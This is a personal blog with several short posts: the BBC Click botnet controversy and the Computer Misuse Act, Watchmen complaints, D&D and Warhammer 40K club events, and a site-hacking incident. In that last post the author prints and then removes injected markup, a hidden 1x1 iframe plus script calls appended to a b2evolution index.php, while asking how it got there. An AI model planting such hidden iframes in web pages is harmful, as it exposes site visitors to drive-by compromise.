Click “The BBC’s  flagship technology programme” have gained access to and used a botnet in a piece of investigative journalism.

Once they had gained control of the botnet “Click ordered its PCs to send out spam” and”Click launched a Distributed Denial of Service (DDoS) attack on a backup site owned by security company Prevx”. Although the email addresses spammed and site DDoSed were both in agreement, the infected PCs that made up the botnet belonged to people who had not agreed to take part. This seems like a clear crime under the Computer Misuse Act 1990:

(1) A person is guilty of an offence if—

(a) he causes a computer to perform any function with intent to secure access to any program or data held in any computer;

(b) the access he intends to secure is unauthorised; and

(c) he knows at the time when he causes the computer to perform the function that that is the case.

I have emailed the BBC to ask them for an explanation of their action, and will post an update when I know more or receive a response.

update 10:47: The email I sent to the BBC is below:

In this story it is stated that you acquired and used a botnet. Although the target of the DDoS and spam had consented to this, the article makes clear that the computers that made up the botnet belonged to owners who were not aware you had access.

Can you please respond regarding your position on the legality of your teams actions, especially with regards to the Computer Misuse Act 1990.

Regards,
John Graham

update 13:23.

Still nothing from the BBC and nothing on The Reg, but Sophos’s Graham Cluley has written now blogged about this. His piece is worth checking for extra details, which included:

Furthermore, at the end of the first excerpt you’ll see that the BBC “warned” the users that their computers were part of a botnet. They did this by changing the desktop wallpaper of affected computers owned by innocent third parties to display a message from BBC Click.

As Graham notes this looks like another clear violation of the Computer Misuse Act. Also, the email accounts they spammed were located on Google and Microsoft owned services…

update 13:30

Well The Reg has finally posted an article on this story. For the moment as they haven’t mentioned the tip off I gave them over 3 hours ago.

update 14:17

I have received a very polite response to an email query to John Leydens the journalist who wrote The Register’s article on the BBC Click Botnet. It seems they had multiple tip-offs which seems plausible and the delay in posting the story was due to attempts to gain comment from the BBC and other sources prior submitting.

I hope you find it as suprising as I did to find out that some people are complaining that Watchmen was inappropriate for their children. Just Google “Kid-Friendly Watchmen” and after a couple of posts about a bad 80’s cartoon you’ll see some classic examples.

My family and I walked out of this movie rather than finish watching it…  unfortunately many families will be like mine and take children to see this horror not realizing what is going to happen. I feel victimized by this movie and I spent hours appologizing to my 8 year old

I’m pretty sure that the R rating was intended to give you a hint.

My husband said he lost count of how many times he saw penis flash across the screen and how many people ended up getting up and leaving with thier children. But he said he was more amazed by how many stayed.

And there was me thinking I wouldn’t be able to sneak a few pleasantly puerile words into my blog subtly.

As the internet is such a wonderful forum of understanding and politeness I am sure you will not be surprised to know that people who posted complaining were quickly set upon by a group of rabid insult spewing morons. Lets get things straight, I think taking your kids to see an R rated film without any research is stupid and trying to blame someone else afterwords is refusing to accept that you made a mistake but I don’t need to post abuse due to that view.

Has anyone seen a more bizarre example of parents complaining about films they took their kids to see (Saw IV perhaps?) or can someone offer an insight into why parents take the kids and what can be done (bar banning mature films)?

update 16th March 10:35

I got to see the Watchmen on Friday 13th. I was impressed by Snyder’s visual style (as I was with the 300), and with the depth of the backplot something which given the graphic novels high ratings I am sure Alan Moore can take credit for. I won’t attempt a review, because I hope no one really cares what I think about films especially with thousands of decent reviewers online. Suffice to say I am looking forwards to seeing it again as I think there was plenty of depth I missed the first time.

Although the film contains plenty of fighting there is actually very little graphic violence (there is some). Dr. Manhattans WMD does make it on screen a lot (often on the screen 3+ times at once) but it’s blue and computer generated for crying out loud. There is sex, and it’s probably a little longer and more graphic than average and than necessary (but then so is a lot of film violence in 18s). Personally I would be completely happy letting a 15 year old see that (he’ll of seen far worse online anyhow) and I wouldn’t let a 10 year old see it, but then I’m not a parent so ymmv.

I am part of a D&D 4 campaign being run by Maurice Walshe at the local gaming club Bedford Gladiators. We play once a month and started with 10 players, with 7 of those still taking part. During the 5 months we have been playing we have been following a well crafted story which has been Dungeon Mastered well and have an interesting party both in terms of races and roles.

Momentum

What I have found interesting though is how key momentum is to bringing the fun (I use this phrase only as an ironic reference to the obsession the D&D4 book writers have with it). During the first couple of sessions the gigantic party size and the fact the majority of players are new to D&D4 meant that things were always going to progress slowly. However even as party size decreased and the players’ rules knowledge improved momentum hasn’t always been consistently present.

Yesterday we had a party of 7 players (including a couple that hadn’t been present for a couple of months), and a gaming session that was almost entirely dominated by a single encounter fighting something like 17 enemies. Although we were slow to get going once underway the game had enough momentum to keep players interested. The month before with only 5 players and an adventure that included numerous small combat encounters and some interesting NPCs it seemed (at least to some players) that things progressed a little too slowly.

The fact that a session with more players and less story seemed more engrossing appeared odd to me, but I am beginning to think that players aren’t put off by the time between their actions, but instead by the momentum of the game while they aren’t active. To put it in context, it is interesting to watch any number of team mates play when they work swiftly and perform interesting actions, but if you have to sit through just one other player who takes 5 minutes to shift and then run away repeatedly you’ll swiftly want to take up self harm to alleviate the boredom.

What I think helped massively last night was that the player managing the initiatives was pro-active in getting players acting (thanks Stephen) and the players as a whole wanted a fast pace and were encouraged by the group to act at it. I also think that once a good pace is found players will endeavour to work at it, but in the same way once momentum is lost and players lose interest it will take a conscious effort by the DM or the players as a group to bring things back on track.

I’ve pretty much made the decision to keep anything Slashdot related off this site, but the following seemed amusing enough to warrant posting. In response to an article on an Iranian scientific breakthrough I said:

It is nice to see something that isn’t negative about Iran getting into western news. Iran has a population around that of the United Kingdom so I have no doubt that numerous beneficial scientific discoveries are made there.

I can’t tell whether the following response was because I didn’t slag off Iran or simply because he hated the phrase I used:

“I have no doubt that …”

This invariably means the person has no evidence for the following statement, isn’t looking for evidence and doesn’t want to hear any evidence and is sticking his fingers in his ears and going “LALALALALA” against anyone trying to argue his point.

I know from the multitude of responses on Slashdot pointing this out that I am not the only one who found the fact someone was complaining about I have no doubt that by using the phrase This invariably means more than a little self-defeating.

As a bonus, someone later responded with another example of Iranian science, here is wired reporting on Iranian super-concrete although sadly they focus on its military potential even though it wasn’t even designed for that purpose.

8 players took part in the 500pt Warhammer 40K campaign I ran at the weekend, although 3 games were originally planned we only had sufficient time to play 2. Everyone seemed to have a good day, and it has got 40K back firmly into the playing schedule and one of the club members considering selling his soul to the Chaos gods for the money to buy some troops in their name.

The only area where I think I could and should have planned better was time. The trouble I find with time is that it never behaves in practice like it seems it should in theory.

1. I had a previous engagement which I was late for, by good fortune I was done in time but not early enough to get boards setup and explain the day to players as early as hoped.
2. People never arrive the ‘the time’, something about which I am as bad as anyone else. It is worth planning a short period of lost time into the beginning of an event to cover for this (say 14:00 start, actually plan for 14:20 etc).
3. Factor in meals  when planning timings, something I didn’t do and then proceeded to go and get chips prior to starting the first game.
4. Consider the experience of the people playing. We had a couple of new players (and Dave!) and were never going to complete games as quickly as other players.

If you do end up in a situation where time is becoming an issue, consider your options. I chose to drop the 3rd game at the end of the 1st game as it was clear we weren’t going to get through two more games in the time available. If you don’t want to drop games then you need to manage time the whole way through the event. This means making it clear to players when they must be finished by, and what to do if they haven’t completed the game by this point. If I was organising an event with strict time limits I would probably not play myself, as this would give me the ability to monitor games and try and keep them on track.

The last update on Adrantis V should be when I have produced an updated version of the Adrantis V campaign pack, and publish that to the site.

In the process of creating this site I have been checking up on other domains I own and considering whether they need to exist as seperate entities or could be subsumed into this site. Maurice Walshe noticed some strange behaviour on one of these domains. When visited in IE7 the site attempted to execute a script and then crashed the browser. This set some alarm bells going as although I had semi-abandoned this domain as a failed experiment with b2evolution, it was still getting quite a bit of traffic and I didn’t want to be responsible for people’s computers being compromised.

My standard browser is FireFox and on visiting the domain in this browser I noticed no issues with how the site behaved. Opening up IE7 and trying that prompted a hissy fit by the computers virus checker which noted a malicious JavaScript attempting to run. I opened up the source code for the page and the following section at the very end jumped out at me.

<script>check_content()</script><script>check_content()</script>
<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'>
</iframe><script> 

It didn’t take a genuis to work out that this wasn’t b2evolution code and was evidently the cause of the issue. Due to the fact that the code was positioned after the </html> tag meant this could only plausibly be in the index.php and/or default.php. Sure enough, when I checked these files there it was sitting at the end and removing it fixed the damage.

What I have not however been able to determine is how the code was appended to the files. It is evidently possible for someone to inject new code into this sites index.php file which will be run by all the visitors. Has anyone had an issue like this (especially if it is with b2evolution) and if so what was the exploit?

Well the Adrantis V campaign took place today with 8 players including myself. The campaign started around an hour late, and in the end we only got two games each but it appeared that everyone had a good time, and a couple of new players got a friendly introduction to the joys of war in the 41st millennium.

The forces of the Imperium took a sound thrashing, with Maurice’s Tyranids leading the way for the enemies of man. Chris led his Imperial Guard on a one man crusade to hold the relics of Adrantis V but my Crimson Fists and his other allies were found wanting. Thanks to everyone who took part.

I intend to do at least one more article discussing the actual running of the Tournament and a couple of the lessons learnt, and then update the campaign pack in case anyone else wants to use it for inspiration or guidance.

I’ve uploaded the photos I took during the day to my Picasa gallery, but a few of my favourites are below.

I have just uploaded the initial draft of the information for the Adrantis V campaign. This is a one day Warhammer 40k campaign I am running at my local wargaming club (The Bedford Gladiators). You can find the full details at Adrantis V Warhammer 40K Website

The campaign is planned for this Sunday the 8th March and should consist of 3 games of Warhammer 40k with players using 500pt lists.

Having discussed the issue of web presence with some friends in the Web Development and SEO (Search Engine Optimisation) field, it seems that although I have been diligent in managing my online presence my choice to do so by ensuring my absence from search results was not the correct course of action.

Until now searching for “John Graham” on any of the major search engines would find nothing related to me within the first 100 results, which is more than enough to be effectively invisible to casual browsers. However, this is a more web aware age and simply not appearing in a negative light online isn’t enough anymore (or so the logic goes). My intention is to develop this site into a showcase of my achievements and place to publish material related to my interests, and to use it as the vehicle to move my web presence from ‘Ninja like stealth’ (obscurity) to decisive and positive.